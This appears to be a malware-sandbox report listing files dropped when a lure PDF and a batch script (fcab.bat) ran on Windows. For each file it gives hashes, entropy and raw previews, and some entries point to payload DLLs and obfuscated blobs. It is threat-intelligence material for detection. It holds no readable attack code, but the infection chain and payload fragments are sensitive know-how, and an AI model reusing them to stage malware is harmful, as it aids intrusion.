                                                      Preview:0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .Vsl..[/....."#.D3...;..A.A..Eo........T........Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):289
                                                      Entropy (8bit):5.24593160528707
                                                      Encrypted:false
                                                      SSDEEP:6:k7Onq2PWXp+N2nKuAl9OmbnIFUtIO8XFb9ZmwuO8XFbPkwOWXp+N2nKuAl9Ombjd:kmvaHAahFUtMB/Gb5fHAaSJ
                                                      MD5:CAB02545BA5B1DD30269CF5C3B32314F
                                                      SHA1:815D6D6BD97F6733503D6A4A63722BFA12A411F5
                                                      SHA-256:153E893A11C3F5A15BE6A8653811F6A28B6473425FFC35D072C7508760E8BECF
                                                      SHA-512:CD63FD987FF1062B425903BBC981B72D1D4693A7E3EFC00C074BA4F3286609D5ED2A729C2F22622A06DF7A62BE059532BF2922FF350A9914D1385713F50C8F51
                                                      Malicious:false
                                                      Preview:2023/06/01-12:14:36.953 fb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:36.962 fb4 Recovering log #3.2023/06/01-12:14:36.962 fb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):289
                                                      Entropy (8bit):5.24593160528707
                                                      Encrypted:false
                                                      SSDEEP:6:k7Onq2PWXp+N2nKuAl9OmbnIFUtIO8XFb9ZmwuO8XFbPkwOWXp+N2nKuAl9Ombjd:kmvaHAahFUtMB/Gb5fHAaSJ
                                                      MD5:CAB02545BA5B1DD30269CF5C3B32314F
                                                      SHA1:815D6D6BD97F6733503D6A4A63722BFA12A411F5
                                                      SHA-256:153E893A11C3F5A15BE6A8653811F6A28B6473425FFC35D072C7508760E8BECF
                                                      SHA-512:CD63FD987FF1062B425903BBC981B72D1D4693A7E3EFC00C074BA4F3286609D5ED2A729C2F22622A06DF7A62BE059532BF2922FF350A9914D1385713F50C8F51
                                                      Malicious:false
                                                      Preview:2023/06/01-12:14:36.953 fb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:36.962 fb4 Recovering log #3.2023/06/01-12:14:36.962 fb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF6f8abf.TMP (copy)

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):289
                                                      Entropy (8bit):5.24593160528707
                                                      Encrypted:false
                                                      SSDEEP:6:k7Onq2PWXp+N2nKuAl9OmbnIFUtIO8XFb9ZmwuO8XFbPkwOWXp+N2nKuAl9Ombjd:kmvaHAahFUtMB/Gb5fHAaSJ
                                                      MD5:CAB02545BA5B1DD30269CF5C3B32314F
                                                      SHA1:815D6D6BD97F6733503D6A4A63722BFA12A411F5
                                                      SHA-256:153E893A11C3F5A15BE6A8653811F6A28B6473425FFC35D072C7508760E8BECF
                                                      SHA-512:CD63FD987FF1062B425903BBC981B72D1D4693A7E3EFC00C074BA4F3286609D5ED2A729C2F22622A06DF7A62BE059532BF2922FF350A9914D1385713F50C8F51
                                                      Malicious:false
                                                      Preview:2023/06/01-12:14:36.953 fb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:36.962 fb4 Recovering log #3.2023/06/01-12:14:36.962 fb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):131072
                                                      Entropy (8bit):0.010978819626460943
                                                      Encrypted:false
                                                      SSDEEP:3:ImtVdXb+j4x9pPlXlpyPll//zVrzlltD0lGQZ7XEZhGIelHdP4/X:IiVtg4x9pdM//hFwl570ZhdelG/
                                                      MD5:E36F8F81D3C03F6AAF7D768706B7673F
                                                      SHA1:EECE93F9E417717892E50F6A159516DD76C255B0
                                                      SHA-256:C6E687FF9677244574F37AD2877726DF64E5BAADDA2ABE8C4759BDE8344E44F2
                                                      SHA-512:0582ADCFA1A09095D4482C9A61475C8B77FF444BF2655DE4F6583BBB2699A054BBB2292DE2741FEEB27AFE0835B0B48F476418EE1A666DE20CA146D1EB4390A4
                                                      Malicious:false
                                                      Preview:VLnk.....?.......Tq.>..j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-230601191432Z-291.bmp

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                      File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                      Category:dropped
                                                      Size (bytes):65110
                                                      Entropy (8bit):0.6442903166717108
                                                      Encrypted:false
                                                      SSDEEP:96:6JiNp29ECmTTT8dePc4lDe/quy47rHMMMT8:CyCaT8UgB3
                                                      MD5:E0E44159B1CE64E3FBCA349002312A5A
                                                      SHA1:3E2C1142527A78285FCBE981250E07A6FB5C94E5
                                                      SHA-256:850CACAE25D1D93F40679BF94F801027CDB3DFDACA2CDFFBA2836EE0B19DCE44
                                                      SHA-512:EFC5A54E1A000DD4D38AC95EFA76412A2B4EF7E94A7B4C6AC20A8656551756D3D05A0323BB29CAC47008D71024300468B9B2A735CA16A23EC6DF1CEEC856E487
                                                      Malicious:false
                                                      Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3024000, file counter 12, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 12
                                                      Category:dropped
                                                      Size (bytes):61440
                                                      Entropy (8bit):3.564681384269021
                                                      Encrypted:false
                                                      SSDEEP:384:3eI9dThytELJ8fwRRwZsLRGlKhsvXh+vSc:akYZsLQhUSc
                                                      MD5:70C5EDA9C2C083EBD31C620F48295130
                                                      SHA1:D1D0E5C780AF5948960A1EE4F459D7859F9A10AB
                                                      SHA-256:DE69682EDB5BB53A23DE519B068D612DB50328B69016987BA44C5635E1ECA3C6
                                                      SHA-512:7633E26C4C4985F6092EF6DD6E94503A3DB4D9FF83AA1853F0153FC5B02AACFAF63E9FB8D0C295C1B2E8F792199F07EBB103B7D711BECFD25661C13AD6C6F9E2
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                      File Type:SQLite Rollback Journal
                                                      Category:dropped
                                                      Size (bytes):8720
                                                      Entropy (8bit):3.2886681294117817
                                                      Encrypted:false
                                                      SSDEEP:48:7M5om1CNiom5iom2om1Nom1Aiom1RROiom1oom1pom1zZiomVsiomg/qQlmFTIFz:7XNqOhfCs/N49IVXEBodRBkg
                                                      MD5:E282D63EA2A4C99EE462E7FB8C6D9D45
                                                      SHA1:F1D349E14319BBE50F3768FC711AD2C6E85132F5
                                                      SHA-256:A42BA7E9A2D3B914995AA9494C840017D81B0471DB9C41FD367BC966DC0FF642
                                                      SHA-512:594EA155A87D341CE9D2C1EAF1B4AF7A4317AD14D2BBE8172B240C713FA6E705BEC67BA2E65BE2D230D4115C88B84B61706DAD5F4B35293462AC2C50BC7166B7
                                                      Malicious:false
                                                      Preview:.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s........L.s.y................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Quarrelers.Cod

                                                      Download File
                                                      Process:C:\Users\Public\fcab.bat
                                                      File Type:ASCII text, with very long lines (63174), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):63174
                                                      Entropy (8bit):2.6774097576064904
                                                      Encrypted:false
                                                      SSDEEP:768:3YEEGqhLpa+/YcynMY2/LX+OLugY5QzfsqHeWEEtKxla+2HfoiHdGhM0RSliNkWj:P+gnaLU6nHfOhJSAk9MN8ABC0riG
                                                      MD5:4A179C732FBA82188F2D1C207BFE228E
                                                      SHA1:D8A88AB76074671ED11A9636DBE6012A2B61C6C1
                                                      SHA-256:2ADE6C66A5BF036D8E9899ADE349C7A887BE41757A7004869E19A64AB2BD0B7E
                                                      SHA-512:D6200251DC566516FFD8601153022B0E8AAAFCED83CA2A95CB3F93E12E84DDFEC2FBC48CACFE49EBF34A25D5418FDEF154D31AB008BBA878B7B21E7D98FD81EF
                                                      Malicious:false
                                                      Preview:003000E9004E00000041000000484800D10000606000230000575700C10000006A6A00A0A0A0001717170000005C5C00A7000000F50000004C4C000028282800A70000A70070707070707000AF00DF00AFAF00EBEB00AF0000000000F00057001F008D8D002C2C2C0000000000606060606060600000800000E7000000320000003737007A7A0000606060606000007474740000000000262600BDBD008F0000F8F80051510033330000CC0000000000E3E300B00000BA0000000303009595959500B40054545454005700F600006C0000EA004A4A000D00001B1B1B1B000039000000000000737373730000AC004100000000002B0000202020202000858500CC000017005900003D0045450000006D00FE00000005050505000055555500000098000000AC00007E006200000900003D3D004F4F000000000000D6007D7D003D00000000000043430000007F007E00F600000000000000000000000041008E8E8E8E8E8E8E006F6F0035004B000000CA002C00130000000000000000AE00006000000000EB000000E700004D4D4D00AD0000330045454545450000000500A9A9008D8D0000D4000000ED00000000003D3D000000C1C1000000000B000000CACACACACACACA0047003232004E4E00000000F300000000003D00008E8E007F000E004545454500007B009C9C9C00000003030000

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\Postpyloric6.Ann

                                                      Download File
                                                      Process:C:\Users\Public\fcab.bat
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):118233
                                                      Entropy (8bit):7.710808982633477
                                                      Encrypted:false
                                                      SSDEEP:3072:XO5UDdjGuQqD+lhBEfDhNTWYZwhVZqBEKwib7YuX3:LDddisbaY6hVZqBLdRX3
                                                      MD5:A7B2863D380B7FE3F8E99B4BF634B39F
                                                      SHA1:85595D001B815501BB91996BCAE34600ABA3C36E
                                                      SHA-256:65FE205CBE270540C6E67A3307C61EE18475062F36F8A5836B3958BD7E24F533
                                                      SHA-512:3403955017869C8A4602441B20EDC52EC9AFC26CA6FE3891309BEF8B2A4CDD7C4D50CC2DCE667467CC72044C01F729476772FE1B83EF2F4A5CFB3940A4BF7D9B
                                                      Malicious:false
                                                      Preview:...............................U..].........CCC.....2.4.....<.................4.......ddddddd.......w................DDDD....ttt..........................mm......v.x..............%.......}}.u.....................8................}.K.5...................g...u.......c............b.......ff....&&.........l.....................?...............h.......!..|......5......................................................T...4...yy.........................oo.....j..r.......V..D.....V..........................(......C..333............99..P..........******..JJ..iii.........m.$..........l..$..................................................8....ppppppp........~~~~..........QQQQ..n..M.....................[....GG.............gggggggggg..........===.6.........................C.................999......+.......222......0.y..............b.....!!..................U........[.zz..................7..................Z..........YY.......A.....|.....M........,,..LLL.1...KK.....H......PP......O..e....J.o.L.....|

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll

                                                      Download File
                                                      Process:C:\Users\Public\fcab.bat
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):88064
                                                      Entropy (8bit):5.775805248630538
                                                      Encrypted:false
                                                      SSDEEP:1536:QFNovLGNuZPQtwhY4SFDivO5Ib6VU3x8sDKxq:QFNsLGNulhY4SG+xq
                                                      MD5:0EDD7743DB76D68D2E198F137E56360C
                                                      SHA1:76B0ACA1C410901C8399FBFDAC2AC36E80C4837C
                                                      SHA-256:F03C45B29D8DB5C2BD9461EFB834723C2F9C84A1FED921D9577BC0511AE0B86D
                                                      SHA-512:67716007A5771D3A45104CB0C3823EBAE58F39E91B5A8AA4653A6FD3E65162C824DF7E5944A123DA70F7739904EF46E43B7A7E1906BE95FB11CAE906673FBB58
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: zpeu.exe, Detection: malicious, Browse
                                                      • Filename: zpeu.exe, Detection: malicious, Browse
                                                      • Filename: as.ps1, Detection: malicious, Browse
                                                      • Filename: KwP6qU3cQ8.exe, Detection: malicious, Browse
                                                      • Filename: KwP6qU3cQ8.exe, Detection: malicious, Browse
                                                      • Filename: DB948GHBNJI.xlsx, Detection: malicious, Browse
                                                      • Filename: Order-new world foods.xlsx, Detection: malicious, Browse
                                                      • Filename: 8cAZneRN6B.exe, Detection: malicious, Browse
                                                      • Filename: 8cAZneRN6B.exe, Detection: malicious, Browse
                                                      • Filename: fr34veeTGm.exe, Detection: malicious, Browse
                                                      • Filename: fr34veeTGm.exe, Detection: malicious, Browse
                                                      • Filename: ShipmentReceipt9521368040.xlsx, Detection: malicious, Browse
                                                      • Filename: njUIPPVrud.exe, Detection: malicious, Browse
                                                      • Filename: njUIPPVrud.exe, Detection: malicious, Browse
                                                      • Filename: ShipmentReceipt93213628045.xlsx, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.O...........!.....N..........~m... ........@.. ...............................%....@.................................$m..W....................................l............................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B................`m......H........F...&...................E.......................................(....*..0................(....(......(....&.(...+*."..(....*...Z.~....(....-..s....*.*..0..6........{.........(.....{....M........ZXM)....(.......(.....*...0..D........{........,..o....+.~....(.....{....M........ZXM)....(.......(.....*.0..5..........{..........(.....{....M........ZXM)....(.........*....0..6..........{..........{....M........ZXM)....(..........(.....*...0..:.......s.......o......(......~.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\bn.txt

                                                      Download File
                                                      Process:C:\Users\Public\fcab.bat
                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):15062
                                                      Entropy (8bit):4.039346182307332
                                                      Encrypted:false
                                                      SSDEEP:192:iM+g4O23sZEstg+lTr++0Mx148IiZaXTXEU10bXYc+4/rexX4:iMyc2stg+lTr++0MQ8DZRDYc+4axI
                                                      MD5:D0E788F64268D15B4391F052B1F4B18A
                                                      SHA1:2FD8E0A9DD22A729D578536D560354C944C7C93E
                                                      SHA-256:216CC780E371DC318C8B15B84DE8A5EC0E28F712B3109A991C8A09CDDAA2A81A
                                                      SHA-512:D50EA673018472C17DB44B315F4C343A2924A2EAA95C668D1160AA3830533CA37CC13C2067911A0756F1BE8C41DF45669ABE083759DCB9436F98E90CBB6AC8BF
                                                      Malicious:false
                                                      Preview:.;!@Lang2@!UTF-8!..; 4.46 : Team Oruddho (Fahad Mohammad Shaon, Mahmud Hassan) : http://www.oruddho.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Bangla.........401..... ..................&.......&....&.... ................&...... .......440..&....... .... ........&...... .... .............. ......&........& .......&.............. ............... ..... .... ......?..500..&......&..................&..&.......&........&........540..&........ .....7-zip-. ........ ........... ........ .....&..........&............. ...

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\find-location-symbolic.svg

                                                      Download File
                                                      Process:C:\Users\Public\fcab.bat
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):713
                                                      Entropy (8bit):4.445408002557924
                                                      Encrypted:false
                                                      SSDEEP:12:TMHdPnnl/nu3tlndL9+Wlz3MQFcWUio23kRqaM8UwYOWlz2Wlzm7Wlzi5WlzsbWW:2dPnnxu3tldLklFWUi/3kRqaRUZODv7R
                                                      MD5:9A5B1DB3C4E78A928BDB639BE46AA003
                                                      SHA1:595D3D9C7BB646CF607923AEBC3583B48F03B426
                                                      SHA-256:0C481D646B531DCBF2FCCE2A034CE6A202CAEEB1C17A591756CB3A08514AC9ED
                                                      SHA-512:CA5E59B27D89651DFE89868C2D0DF63EFE64AB4B3E0E49937CFC15E84610505E2378E29D716FB803BEF74C80D99D25E93B7D5E8D7B1BE3EF905A8C910011F47F
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 11 8 c 0 1.65625 -1.34375 3 -3 3 s -3 -1.34375 -3 -3 s 1.34375 -3 3 -3 s 3 1.34375 3 3 z m 0 0"/>. <path d="m 8 1 c -3.851562 0 -7 3.144531 -7 7 s 3.148438 7 7 7 s 7 -3.144531 7 -7 s -3.148438 -7 -7 -7 z m 0 2 c 2.773438 0 5 2.230469 5 5 s -2.226562 4.996094 -5 4.996094 s -5 -2.226563 -5 -4.996094 s 2.226562 -5 5 -5 z m 0 0"/>. <path d="m 7 0 h 2 v 3 h -2 z m 0 0"/>. <path d="m 7 13 h 2 v 3 h -2 z m 0 0"/>. <path d="m 16 7 v 2 h -3 v -2 z m 0 0"/>. <path d="m 3 7 v 2 h -3 v -2 z m 0 0"/>. </g>.</svg>.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\network-cellular-symbolic.svg

                                                      Download File
                                                      Process:C:\Users\Public\fcab.bat
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):441
                                                      Entropy (8bit):4.575285851859924
                                                      Encrypted:false
                                                      SSDEEP:12:t4CDqwqZo8nGGa6Smf+e9s/J7e3VN5IUavl+i:t4CGosm6Sle9s/Be3Vv+lN
                                                      MD5:79F668FBC971471D3CE930DD5B53F01D
                                                      SHA1:0A21641F8BDCA5C3DDAAA2224E80784BF1F3EE9A
                                                      SHA-256:8ECA65E299CCB64B2145263827EED45130336E01A4FB1F309C8A36E8751473D4
                                                      SHA-512:DFA0CD2923F83514181299F7374D553B2B427028E47BC2033E377850FD98121806EA370DEE64349AE410F84CC815E74AFF8E11227FCF21E2E1BF83BAA6BD2616
                                                      Malicious:false
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1c-1.261.98-2 2.833-2 5 0 2.127.777 4.005 2 5h1V9c-.607-.78-1-1.759-1-3s.393-2.211 1-3V1zm11 0v2c.607.789 1 1.759 1 3s-.393 2.22-1 3v2h1c1.223-.995 2-2.873 2-5 0-2.167-.739-4.02-2-5zM4 3c-.688.784-1 1.743-1 3s.328 2.163 1 3h1V3zm7 0v6h1c.672-.837 1-1.743 1-3s-.312-2.216-1-3zM8 4a2 2 0 100 4 2 2 0 000-4zm0 5a1 1 0 00-1 1v6h2v-6a1 1 0 00-1-1z" fill="#2e3436"/></svg>

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.9260988789684415
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllulb/lj:NllUb/l
                                                      MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                      SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                      SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                      SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                      Malicious:false
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0oywvydb.2fy.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_koaug0jv.qrs.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1

                                                      C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll

                                                      Download File
                                                      Process:C:\Users\Public\fcab.bat
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):11776
                                                      Entropy (8bit):5.659384359264642
                                                      Encrypted:false
                                                      SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                      MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                      SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                      SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                      SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\01CB373UZIDUAU9XTZGP.temp

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):6205
                                                      Entropy (8bit):3.7721478608118546
                                                      Encrypted:false
                                                      SSDEEP:48:I4gokP7yV8FEcD2eCBUUHwS81jTukvhkvklCywC0AWKoJS8TySogZo4GgWKoJS8W:InoO6SCvQ51ekvhkvCCtCZ30H7330H7q
                                                      MD5:4F7B548617649A178D596BEB978A07F7
                                                      SHA1:D7C2B28DF394ADEECFB50546DB60C6E2755641E0
                                                      SHA-256:8C414FB9B3D57D74258BDDEA87AF41D0EFBF458E66AD09122F29224B1D0B0E16
                                                      SHA-512:34890C938852010B5F54EC3F0E379396EABDB0806C0E5F313FF12990CFD3F23907A8235FAD3E710AEBBF49F4B5AB19A89E162BAE127BB900D19DAD7589BFD7B2
                                                      Malicious:false
                                                      Preview:...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-...T.......8.>........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..V.......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..V.......Y....................D1,.R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......Ny..V.......Y....................b5..M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......Ny..V.......Y......................Q.W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..V.......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..V.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..U.......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):6205
                                                      Entropy (8bit):3.7721478608118546
                                                      Encrypted:false
                                                      SSDEEP:48:I4gokP7yV8FEcD2eCBUUHwS81jTukvhkvklCywC0AWKoJS8TySogZo4GgWKoJS8W:InoO6SCvQ51ekvhkvCCtCZ30H7330H7q
                                                      MD5:4F7B548617649A178D596BEB978A07F7
                                                      SHA1:D7C2B28DF394ADEECFB50546DB60C6E2755641E0
                                                      SHA-256:8C414FB9B3D57D74258BDDEA87AF41D0EFBF458E66AD09122F29224B1D0B0E16
                                                      SHA-512:34890C938852010B5F54EC3F0E379396EABDB0806C0E5F313FF12990CFD3F23907A8235FAD3E710AEBBF49F4B5AB19A89E162BAE127BB900D19DAD7589BFD7B2
                                                      Malicious:false
                                                      Preview:...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-...T.......8.>........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..V.......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..V.......Y....................D1,.R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......Ny..V.......Y....................b5..M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......Ny..V.......Y......................Q.W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..V.......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..V.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..U.......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........

                                                      C:\Users\user\Desktop\List of required items and services.pdf

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PDF document, version 1.7 (zip deflate encoded)
                                                      Category:dropped
                                                      Size (bytes):653248
                                                      Entropy (8bit):7.983402816932296
                                                      Encrypted:false
                                                      SSDEEP:12288:Z5j8QLfikr2uyiCDVvzDFgONPYpKE7nmP4II3xHjK4HTbuSGxEw6:H8QbZ2upCDtuOQKE7nmA3xWYT6LT6
                                                      MD5:9B05142184F080AE36983D0A25597143
                                                      SHA1:6421CD63995163132E89709FF70D695825A3CBDC
                                                      SHA-256:F16B7347BCAADA09E4A85E92A704CCC67F413DDBA62BBDF4BBE14A7B687AC455
                                                      SHA-512:EBDB6D9682A0DAC526214D9E5173E0CF627D1E538F2A728768E913FD2CE94B926DA6A248DFB5AE6D1DFAF0CE33807D3007D05785BE200687C55B926DCE6908DC
                                                      Malicious:false
